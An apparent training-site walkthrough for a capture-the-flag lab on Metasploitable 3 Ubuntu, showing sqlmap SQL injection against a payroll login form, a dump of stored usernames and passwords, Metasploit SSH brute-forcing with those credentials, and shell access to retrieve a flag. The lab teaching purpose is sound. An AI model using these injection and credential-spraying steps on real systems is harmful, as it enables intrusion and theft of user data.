<!DOCTYPE html>
<html lang="en">
    <head>
        <meta charset="utf-8">
        <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
        <meta http-equiv="x-ua-compatible" content="ie=edge">
        <meta name="description" content="Metasploitable 3 Ubuntu - 8 of Clubs">

        <meta property="og:site_name" content="Hacker Lab Learn"/>
        <meta property="og:title" content="8 of Clubs | Hacker Lab Learn"/>
        <meta property="og:description" content="Metasploitable 3 Ubuntu - 8 of Clubs"/>
        <meta property="og:url" content="https://my-jigsaw-docs.com/walkthroughs/metasploitable-3-ubuntu/8-of-clubs"/>
        <meta property="og:image" content="/assets/img/logo.png"/>
        <meta property="og:type" content="website"/>

        <meta name="twitter:image:alt" content="Hacker Lab Learn">
        <meta name="twitter:card" content="summary_large_image">

        
        <title>Hacker Lab Learn | 8 of Clubs</title>

        <link rel="home" href="https://my-jigsaw-docs.com">
        <link rel="icon" href="/favicon.ico">

        
                    <!-- Insert analytics code here -->
        
        <link href="https://fonts.googleapis.com/css?family=Nunito+Sans:300,300i,400,400i,700,700i,800,800i" rel="stylesheet">
        <link rel="stylesheet" href="/assets/build/css/main.css?id=829c17c8b6b463371e17">

            </head>

    <body class="flex flex-col justify-between min-h-screen bg-grey-lightest text-grey-darkest leading-normal font-sans">
        <header class="flex items-center shadow bg-white border-b h-24 mb-8 py-4" role="banner">
            <div class="container flex items-center max-w-4xl mx-auto px-4 lg:px-8">
                <div class="flex items-center">
                    <a href="/" title="Hacker Lab Learn home" class="inline-flex items-center">
                        <img class="h-8 md:h-10 mr-3" src="/assets/img/logo.svg" alt="Hacker Lab Learn logo" />

                        <h1 class="text-lg md:text-2xl text-blue-darkest font-semibold hover:text-blue-dark my-0 pr-4">Hacker Lab Learn</h1>
                    </a>
                </div>

                <div class="flex flex-1 justify-end items-center text-right md:pl-10">
                                    </div>
            </div>

                <button class="flex justify-center items-center bg-blue border border-blue h-10 mr-4 px-5 rounded-full lg:hidden focus:outline-none"
    onclick="navMenu.toggle()"
>
    <svg id="js-nav-menu-show" xmlns="http://www.w3.org/2000/svg"
        class="fill-current text-white h-9 w-4" viewBox="0 0 32 32"
    >
        <path d="M4,10h24c1.104,0,2-0.896,2-2s-0.896-2-2-2H4C2.896,6,2,6.896,2,8S2.896,10,4,10z M28,14H4c-1.104,0-2,0.896-2,2  s0.896,2,2,2h24c1.104,0,2-0.896,2-2S29.104,14,28,14z M28,22H4c-1.104,0-2,0.896-2,2s0.896,2,2,2h24c1.104,0,2-0.896,2-2  S29.104,22,28,22z"/>
    </svg>

    <svg id="js-nav-menu-hide" xmlns="http://www.w3.org/2000/svg"
        class="hidden fill-current text-white h-9 w-4" viewBox="0 0 36 30"
    >
        <polygon points="32.8,4.4 28.6,0.2 18,10.8 7.4,0.2 3.2,4.4 13.8,15 3.2,25.6 7.4,29.8 18,19.2 28.6,29.8 32.8,25.6 22.2,15 "/>
    </svg>
</button>

        </header>

        <main role="main" class="w-full flex-auto">
            <section class="container max-w-4xl mx-auto px-6 md:px-8 py-4">
    <div class="flex flex-col lg:flex-row">
        <nav id="js-nav-menu" class="nav-menu hidden lg:block">
            <ul class="list-reset my-0">
            <li class="list-reset pl-4">
            
        <a href="/getting-started"
            class="lvl0   nav-menu__item hover:text-blue"
        >
            Getting Started
        </a>
    
    </li>
            <li class="list-reset pl-4">
            
        <p class="nav-menu__item text-grey-dark">WebGoat 8 Walkthroughs</p>
    
            
        <ul class="list-reset my-0">
            <li class="list-reset pl-4">
            
        <a href="/walkthroughs/webgoat-8/quickstart"
            class="lvl1   nav-menu__item hover:text-blue"
        >
            Quickstart
        </a>
    
    </li>
            <li class="list-reset pl-4">
            
        <a href="/walkthroughs/webgoat-8/general"
            class="lvl1   nav-menu__item hover:text-blue"
        >
            General
        </a>
    
    </li>
            <li class="list-reset pl-4">
            
        <a href="/walkthroughs/webgoat-8/injection-flaws-sql-injection-introduction"
            class="lvl1   nav-menu__item hover:text-blue"
        >
            Injection Flaws - SQL Injection (Introduction)
        </a>
    
    </li>
            <li class="list-reset pl-4">
            
        <a href="/walkthroughs/webgoat-8/injection-flaws-sql-injection-advanced"
            class="lvl1   nav-menu__item hover:text-blue"
        >
            Injection Flaws - SQL Injection (Advanced)
        </a>
    
    </li>
    </ul>
    </li>
            <li class="list-reset pl-4">
            
        <p class="nav-menu__item text-grey-dark">Damn Vulnerable Web App (DVWA) Walkthroughs</p>
    
            
        <ul class="list-reset my-0">
            <li class="list-reset pl-4">
            
        <a href="/walkthroughs/damn-vulnerable-web-app/quickstart"
            class="lvl1   nav-menu__item hover:text-blue"
        >
            Quickstart
        </a>
    
    </li>
            <li class="list-reset pl-4">
            
        <a href="/walkthroughs/damn-vulnerable-web-app/brute-force"
            class="lvl1   nav-menu__item hover:text-blue"
        >
            Brute Force
        </a>
    
    </li>
            <li class="list-reset pl-4">
            
        <a href="/walkthroughs/damn-vulnerable-web-app/command-injection"
            class="lvl1   nav-menu__item hover:text-blue"
        >
            Command Injection
        </a>
    
    </li>
            <li class="list-reset pl-4">
            
        <a href="/walkthroughs/damn-vulnerable-web-app/cross-site-request-forgery"
            class="lvl1   nav-menu__item hover:text-blue"
        >
            Cross Site Request Forgery (CSRF)
        </a>
    
    </li>
    </ul>
    </li>
            <li class="list-reset pl-4">
            
        <p class="nav-menu__item text-grey-dark">Metasploitable 3 Ubuntu Walkthroughs</p>
    
            
        <ul class="list-reset my-0">
            <li class="list-reset pl-4">
            
        <a href="/walkthroughs/metasploitable-3-ubuntu/quickstart"
            class="lvl1   nav-menu__item hover:text-blue"
        >
            Quickstart
        </a>
    
    </li>
            <li class="list-reset pl-4">
            
        <a href="/walkthroughs/metasploitable-3-ubuntu/ace-of-clubs"
            class="lvl1   nav-menu__item hover:text-blue"
        >
            Ace of Clubs
        </a>
    
    </li>
            <li class="list-reset pl-4">
            
        <a href="/walkthroughs/metasploitable-3-ubuntu/8-of-clubs"
            class="lvl1  active font-semibold text-blue nav-menu__item hover:text-blue"
        >
            8 of Clubs
        </a>
    
    </li>
            <li class="list-reset pl-4">
            
        <a href="/walkthroughs/metasploitable-3-ubuntu/5-of-hearts"
            class="lvl1   nav-menu__item hover:text-blue"
        >
            5 of Hearts
        </a>
    
    </li>
    </ul>
    </li>
            <li class="list-reset pl-4">
            
        <p class="nav-menu__item text-grey-dark">Metasploitable 3 Windows Walkthroughs</p>
    
            
        <ul class="list-reset my-0">
            <li class="list-reset pl-4">
            
        <a href="/walkthroughs/metasploitable-3-windows/quickstart"
            class="lvl1   nav-menu__item hover:text-blue"
        >
            Quickstart
        </a>
    
    </li>
            <li class="list-reset pl-4">
            
        <a href="/walkthroughs/metasploitable-3-windows/king-of-diamonds"
            class="lvl1   nav-menu__item hover:text-blue"
        >
            King of Diamonds
        </a>
    
    </li>
            <li class="list-reset pl-4">
            
        <a href="/walkthroughs/metasploitable-3-windows/ace-of-hearts"
            class="lvl1   nav-menu__item hover:text-blue"
        >
            Ace of Hearts
        </a>
    
    </li>
            <li class="list-reset pl-4">
            
        <a href="/walkthroughs/metasploitable-3-windows/jack-of-hearts"
            class="lvl1   nav-menu__item hover:text-blue"
        >
            Jack of Hearts
        </a>
    
    </li>
    </ul>
    </li>
            <li class="list-reset pl-4">
            
        <p class="nav-menu__item text-grey-dark">Essentials</p>
    
            
        <ul class="list-reset my-0">
            <li class="list-reset pl-4">
            
        <a href="/essentials/scp"
            class="lvl1   nav-menu__item hover:text-blue"
        >
            scp
        </a>
    
    </li>
            <li class="list-reset pl-4">
            
        <a href="/essentials/ssh"
            class="lvl1   nav-menu__item hover:text-blue"
        >
            ssh
        </a>
    
    </li>
            <li class="list-reset pl-4">
            
        <a href="/essentials/ssh-keygen"
            class="lvl1   nav-menu__item hover:text-blue"
        >
            ssh-keygen
        </a>
    
    </li>
            <li class="list-reset pl-4">
            
        <a href="/essentials/browser-developer-tools"
            class="lvl1   nav-menu__item hover:text-blue"
        >
            Browser Developer Tools
        </a>
    
    </li>
    </ul>
    </li>
            <li class="list-reset pl-4">
            
        <a href="/contribute"
            class="lvl0   nav-menu__item hover:text-blue"
        >
            Contribute
        </a>
    
    </li>
    </ul>
        </nav>

        <div class="w-full lg:w-3/5 break-words pb-16 lg:pl-4" v-pre>
            <h1>8 of Clubs</h1>
<p>1. First, get logged into your Kali Linux instance. Checkout the <a href="/walkthroughs/metasploitable-3-ubuntu/quickstart/">Quickstart Guide</a> if you're not sure how to do this. </p>
<p>Next, let's start off by running the same <code>nmap</code> scan we ran in the first step of the <a href="/walkthroughs/metasploitable-3-ubuntu/ace-of-clubs">Ace of Clubs</a> walkthrough guide.</p>
<pre><code class="language-bash"># replace 165.22.171.133 with the IP of your target machine
$ nmap -p 1-65535 165.22.171.133</code></pre>
<blockquote>
<p>Hint: Refer to the <a href="/walkthroughs/metasploitable-3-ubuntu/ace-of-clubs">Ace of Clubs</a> walkthrough guide if you need a refresher on what we're doing with this <code>nmap</code> command.</p>
</blockquote>
<p>2. navigate to port 1180 in a browser to see an open directory.</p>
<img src="/assets/images/walkthroughs/metasploitable-3-ubuntu/8-of-clubs/1-port-80.PNG">
<p>3. Explore the links until you find the payroll app.</p>
<img src="/assets/images/walkthroughs/metasploitable-3-ubuntu/8-of-clubs/2-payroll-app.PNG">
<p>4. Find the login form. Open up the <a href="/essentials/browser-developer-tools">developer tools</a>, and submit anything just to test out the form.
See that we're passing in <code>user</code>, <code>password</code>, and <code>s</code> data fields to the server through a <code>POST</code> request.</p>
<img src="/assets/images/walkthroughs/metasploitable-3-ubuntu/8-of-clubs/3-form-data.PNG">
<p>6. Now let's use the information gathered in the previous step in the <code>sqlmap</code> tool.
In this case we will tell it </p>
<blockquote>
<p>Hint: <code>sqlmap</code> is a command line tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers.
Checkout the <a href="http://sqlmap.org/">official documentation</a> for the <code>sqlmap</code> tool to learn more.</p>
</blockquote>
<p>We're going to use <code>sql</code> map to automate the process of trying common SQL injection techniques to see if it can find an SQL vulnerability in this login form.
Here are the parameters we'll use:</p>
<ul>
<li><code>-u</code> - specifies the target URL.</li>
<li><code>--data</code> - Data string to be sent through the <code>POST</code> request (which we've gathered in the previous step).</li>
<li><code>--tables</code> - Enumerate tables</li>
<li><code>--columns</code> - Enumerate columns</li>
</ul>
<pre><code class="language-bash">$ sqlmap -u http://165.22.142.144:1180/payroll_app.php --data="user=admin&amp;password=admin&amp;s=OK" --tables --columns</code></pre>
<pre><code class="language-bash">        ___
       __H__
 ___ ___[,]_____ ___ ___  {1.3.7#stable}
|_ -| . [(]     | .'| . |
|___|_  [.]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

...it will give you some basic information here..
...and then ask you this question...

there were multiple injection points, please select the one to use for following injections:
[0] place: POST, parameter: user, type: Single quoted string (default)
[1] place: POST, parameter: password, type: Single quoted string
[q] Quit
&gt; 0

...more results showing the different databases and tables, here is the important one...

[16:32:31] [INFO] fetching columns for table 'users' in database 'payroll'
Database: payroll
Table: users
[5 columns]
+------------+-------------+
| Column     | Type        |
+------------+-------------+
| first_name | varchar(30) |
| last_name  | varchar(30) |
| password   | varchar(40) |
| salary     | int(20)     |
| username   | varchar(30) |
+------------+-------------+
</code></pre>
<p>7. Interesting! There is a table <code>users</code> with columns for <code>username</code> and <code>password</code>.
Let's dump the information from these two columns into a csv file using the same <code>sqlmap</code> tool.
Parameters to use:</p>
<ul>
<li><strong>--dump</strong> - dump results</li>
<li><strong>-C</strong> - columns to dump</li>
<li><strong>--csv-del</strong> - what to use as delimiter for csv file</li>
<li><strong>-v 1</strong> - verbosity level, anything  &gt;= 1 will output csv file path</li>
</ul>
<p>Here is the interesting part of the result</p>
<pre><code class="language-bash">$ sqlmap -u http://165.22.171.133/payroll_app.php --data="user=admin&amp;password=admin&amp;s=OK" --dump -C username,password --csv-del=" " -v 1</code></pre>
<pre><code class="language-bash">[16:52:32] [INFO] fetching entries of column(s) 'password, username' for table 'users' in database 'payroll'
Database: payroll
Table: users
[15 entries]
+------------------+-------------------------+
| username         | password                |
+------------------+-------------------------+
| leia_organa      | help_me_obiwan          |
| luke_skywalker   | like_my_father_beforeme |
| han_solo         | nerf_herder             |
| artoo_detoo      | b00p_b33p               |
| c_three_pio      | Pr0t0c07                |
| ben_kenobi       | thats_no_m00n           |
| darth_vader      | Dark_syD3               |
| anakin_skywalker | but_master:(            |
| jarjar_binks     | mesah_p@ssw0rd          |
| lando_calrissian | @dm1n1str8r             |
| boba_fett        | mandalorian1            |
| jabba_hutt       | my_kinda_skum           |
| greedo           | hanSh0tF1rst            |
| chewbacca        | rwaaaaawr8              |
| kylo_ren         | Daddy_Issues2           |
+------------------+-------------------------+

[16:52:32] [INFO] table 'payroll.users' dumped to CSV file '/home/hacker-lab/.sqlmap/output/165.22.171.133/dump/payroll/users.csv'
[16:52:32] [INFO] fetched data logged to text files under '/home/hacker-lab/.sqlmap/output/165.22.171.133'</code></pre>
<p>8. <code>sqlmap</code> dumps the results at  <code>/home/hacker-lab/.sqlmap/output/165.22.171.133/dump/payroll/users.csv</code>
You should be able to use any of these credentials to login to the payroll app.</p>
<pre><code class="language-bash">username password
leia_organa help_me_obiwan
luke_skywalker like_my_father_beforeme
han_solo nerf_herder
artoo_detoo b00p_b33p
c_three_pio Pr0t0c07
ben_kenobi thats_no_m00n
darth_vader Dark_syD3
anakin_skywalker but_master:(
jarjar_binks mesah_p@ssw0rd
lando_calrissian @dm1n1str8r
boba_fett mandalorian1
jabba_hutt my_kinda_skum
greedo hanSh0tF1rst
chewbacca rwaaaaawr8
kylo_ren Daddy_Issues2</code></pre>
<p>9. Next we are going to use the <strong>ssh auxiliary module</strong> in metasploit to see if any of these user/password combinations were re-used as ssh credentials.
Let's start by opening up msfconsole.</p>
<pre><code class="language-bash">$ msfconsole</code></pre>
<blockquote>
<p>Hint: The Scanner SSH Auxiliary module can brute force ssh servers using a provided list of username and passwords.
In our case we'll be using the list we retrieved from the database dump.
See the <a href="https://www.offensive-security.com/metasploit-unleashed/scanner-ssh-auxiliary-modules/">Offensive Security Documentation</a> to learn more.</p>
</blockquote>
<p>10. Use the <strong>Scanner SSH Auxiliary</strong> module to see if any of the username/password combinations we found for the payroll app were re-used as ssh login credentials. </p>
<pre><code class="language-bash">msf &gt; use auxiliary/scanner/ssh/ssh_login</code></pre>
<p>Show what options this module has</p>
<pre><code class="language-bash">msf auxiliary(scanner/ssh/ssh_login) &gt; show options

Module options (auxiliary/scanner/ssh/ssh_login):

   Name              Current Setting  Required  Description
   ----              ---------------  --------  -----------
   BLANK_PASSWORDS   false            no        Try blank passwords for all users
   BRUTEFORCE_SPEED  5                yes       How fast to bruteforce, from 0 to 5
   DB_ALL_CREDS      false            no        Try each user/password couple stored in the current database
   DB_ALL_PASS       false            no        Add all passwords in the current database to the list
   DB_ALL_USERS      false            no        Add all users in the current database to the list
   PASSWORD                           no        A specific password to authenticate with
   PASS_FILE                          no        File containing passwords, one per line
   RHOSTS                             yes       The target address range or CIDR identifier
   RPORT             22               yes       The target port
   STOP_ON_SUCCESS   false            yes       Stop guessing when a credential works for a host
   THREADS           1                yes       The number of concurrent threads
   USERNAME                           no        A specific username to authenticate as
   USERPASS_FILE                      no        File containing users and passwords separated by space, one pair per line
   USER_AS_PASS      false            no        Try the username as the password for all users
   USER_FILE                          no        File containing usernames, one per line
   VERBOSE           false            yes       Whether to print output for all attempts</code></pre>
<p>11. Set the required options. See the output from <code>show options</code> for an explanation of each options we'll set.</p>
<pre><code class="language-bash">msf auxiliary(scanner/ssh/ssh_login) &gt; set RHOSTS 165.22.171.133
RHOSTS =&gt; 165.22.171.133

msf auxiliary(scanner/ssh/ssh_login) &gt; set USERPASS_FILE /home/hacker-lab/.sqlmap/output/165.22.171.133/dump/payroll/users.csv
USERPASS_FILE =&gt; /root/.sqlmap/output/165.22.171.133/dump/payroll/users.csv

msf auxiliary(scanner/ssh/ssh_login) &gt; set RPORT 2322
RPORT =&gt; 2222

msf auxiliary(scanner/ssh/ssh_login) &gt; set VERBOSE true
VERBOSE =&gt; true</code></pre>
<p>12. Run the module to see which username/passwords were successful.</p>
<pre><code class="language-bash">msf auxiliary(scanner/ssh/ssh_login) &gt; run

[-] 157.230.155.174:2322 - Failed: 'username:password'
[!] No active DB -- Credential data will not be saved!
[+] 157.230.155.174:2322 - Success: 'leia_organa:help_me_obiwan' 'uid=1111(leia_organa) gid=100(users) groups=1
00(users),27(sudo) Linux metasploitable3-ub1404 3.13.0-24-generic #46-Ubuntu SMP Thu Apr 10 19:11:08 UTC 2014 x
86_64 x86_64 x86_64 GNU/Linux '
[*] Command shell session 1 opened (172.18.0.2:43927 -&gt; 157.230.155.174:2322) at 2019-05-02 21:17:10 +0000
[+] 157.230.155.174:2322 - Success: 'luke_skywalker:like_my_father_beforeme' 'uid=1112(luke_skywalker) gid=100$
users) groups=100(users),27(sudo) Linux metasploitable3-ub1404 3.13.0-24-generic #46-Ubuntu SMP Thu Apr 10 19:$
1:08 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux '
[*] Command shell session 2 opened (172.18.0.2:35217 -&gt; 157.230.155.174:2322) at 2019-05-02 21:17:21 +0000
[+] 157.230.155.174:2322 - Success: 'han_solo:nerf_herder' 'uid=1113(han_solo) gid=100(users) groups=100(users$
,27(sudo) Linux metasploitable3-ub1404 3.13.0-24-generic #46-Ubuntu SMP Thu Apr 10 19:11:08 UTC 2014 x86_64 x8$
_64 x86_64 GNU/Linux '

... more results</code></pre>
<p>we'll choose one of the successful credentials and ssh into the target</p>
<pre><code class="language-bash">$ ssh -p 2322 leia_organa@157.230.155.174
leia_organa@157.230.155.174's password:
Welcome to Ubuntu 14.04 LTS (GNU/Linux 3.13.0-24-generic x86_64)

 * Documentation:  https://help.ubuntu.com/
New release '16.04.6 LTS' available.
Run 'do-release-upgrade' to upgrade to it.

leia_organa@metasploitable3-ub1404:~$</code></pre>
<p>Woot! this means we have a shell on the victim machine as user <code>leia_organa</code>.
Let's search for any flags out in the open.</p>
<pre><code class="language-bash">leia_organa@metasploitable3-ub1404:~$ find /home -iname "*_of_*"
find: `/home/greedo/.cache': Permission denied
find: `/home/han_solo/.cache': Permission denied
find: `/home/kylo_ren/.secret_files': Permission denied
find: `/home/kylo_ren/.cache': Permission denied
/home/anakin_skywalker/96/66/27/71/85/22/7/25/37/67/22/77/87/57/34/22/93/40/8/10/8_of_clubs.png
find: `/home/anakin_skywalker/.cache': Permission denied
/home/artoo_detoo/music/10_of_clubs.wav
find: `/home/artoo_detoo/.cache': Permission denied
find: `/home/jarjar_binks/.cache': Permission denied
find: `/home/leia_organa/.cache': Permission denied
find: `/home/lando_calrissian/.cache': Permission denied
find: `/home/luke_skywalker/.cache': Permission denied
find: `/home/boba_fett/.cache': Permission denied
find: `/home/jabba_hutt/.cache': Permission denied
find: `/home/ben_kenobi/.cache': Permission denied
find: `/home/vagrant/.ssh': Permission denied
find: `/home/vagrant/.cache': Permission denied
find: `/home/c_three_pio/.cache': Permission denied</code></pre>
<p>13. We'll copy the <code>8_of_clubs</code> back to our Kali Linux instance using <code>scp</code>.
Back out of the victim box with <code>exit</code>.</p>
<pre><code class="language-bash">$ scp -P 2322  leia_organa@157.230.155.174:/home/anakin_skywalker/96/66/27/71/85/22/7/25/37/67/22/77/87/57/34/22/93/40/8/10/8_of_clubs.png ~/
leia_organa@157.230.155.174's password:
8_of_clubs.png                                                               100%  528KB 917.7KB/s   00:00</code></pre>
<blockquote>
<p>Hint: <code>scp</code> is a command line tool that allows you to securely copy files between local and remote hosts.
Checkout our <a href="/essentials/scp">essentials documentation</a> to learn more.</p>
</blockquote>
<p>14. Once you're back on your Kali instance, run <code>exit -y</code> to exit your <code>msfconsole</code> session.
<code>8_of_clubs.png</code> should be visible in your home directory.</p>
<pre><code class="language-bash">$ ls
8_of_clubs.png</code></pre>
<p>15. Now copy the image from you Kali Linux instance back to your local computer.
Replace <code>178.128.77.75</code> with the IP address of your Kali instance.</p>
<pre><code class="language-bash"># run this from your local computer
# replace 178.128.77.75 with the IP of your Kali Linux instance
$ scp -P 2222 hacker-lab@178.128.77.75:/home/hacker-lab/8_of_clubs.png ./</code></pre>
<p>15. And we've captured another flag!</p>
<img src="/assets/images/walkthroughs/metasploitable-3-ubuntu/8-of-clubs/8_of_clubs.png">        </div>
    </div>
</section>
        </main>

        <script src="/assets/build/js/main.js?id=ba3916078c37342007f3"></script>

        <script>
    const navMenu = {
        toggle() {
            const menu = document.getElementById('js-nav-menu');
            menu.classList.toggle('hidden');
            menu.classList.toggle('lg:block');
            document.getElementById('js-nav-menu-hide').classList.toggle('hidden');
            document.getElementById('js-nav-menu-show').classList.toggle('hidden');
        },
    }
</script>

        <footer class="bg-white text-center text-sm mt-12 py-4" role="contentinfo">
            <ul class="flex flex-col md:flex-row justify-center list-reset">
                <li class="md:mr-2">
                    &copy; <a href="https://thehackerlab.co" title="The Hacker Lab website">The Hacker Lab, LLC</a> 2019.
                </li>

                <li>
                    Built with <a href="http://jigsaw.tighten.co" title="Jigsaw by Tighten">Jigsaw</a>
                    and <a href="https://tailwindcss.com" title="Tailwind CSS, a utility-first CSS framework">Tailwind CSS</a>.
                </li>
            </ul>
        </footer>
    </body>
</html>
